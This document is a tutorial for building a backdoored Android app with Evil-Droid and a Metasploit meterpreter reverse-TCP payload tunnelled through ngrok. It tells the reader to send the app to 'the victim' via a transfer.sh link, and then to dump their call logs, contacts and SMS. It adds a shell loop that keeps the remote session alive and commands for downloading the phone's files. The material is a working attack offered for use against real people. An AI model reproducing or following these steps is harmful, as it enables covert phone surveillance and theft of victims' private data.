Hi, all test has done on Kali linux.
Create an account to use tcp connection: https://ngrok.com. Address email like http://www.yopmail.com/en/ work. After create your account, just follow instruction to download, unzip, and create an token.
# 7z x ngrok # ./ngrok --authtoken xxx
Create a tcp tunnel on port 1234:
# ./ngrok tcp 1234
You will receive something like this:
tcp.ngrok.io:15322 -> localhost:1234
# git clone https://github.com/M4sc3r4n0/Evil-Droid # cd Evil-Droid # chmod +x evil-droid # ./evil-droid
 BYPASS AV APK (ICON CHANGE) SET LHOST: tcp.ngrok.io SET LPORT: 15322 PAYLOAD NAME: nice-app payload option: android/meterpreter/reverse_tcp choose payload apk: APK-MSF
Choose an image for your backdoored app.
After, evil-droid will create self-signed certificate to sign your android app, once you have your app,
Copy file to transfer.sh
cd Evil-Droid/evilapk # curl --upload-file nice-app.apk https://transfer.sh/nice-app.apk
|And give the link to the victim, she||he must install the app to their phone.|
Open a new terminal, we use metasploit to listen on port 1234.
# msfconsole use multi/handler set payload android/meterpreter/reverse_tcp set lhost 127.0.0.1 set lport 1234 exploit
To get call log, contact and sms.
dump_calllog dump_contacts dump_sms
help for other commands.
Maintain the access more time
Now than you have access to the phone, we will upload our script to maintain the access until the phone shutdown.
Open an other terminal to create a little script:
# vim backdoor.sh
#!/bin/bash while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 20 done
And back to metasploit, we are again on the phone:
cd /sdcards/download upload backdoor.sh shell sh backdoor.sh
Ctrl+C to quit, and all the 20sec, the app is maintain will back.
If the phone of the victim shutdown or restart, you lost the access like the
backdoor.sh do not start at boot :-(, and we don’t have the root privilege to do this.
To download files from the phone:
cd /sdcard ls cd download download <filename>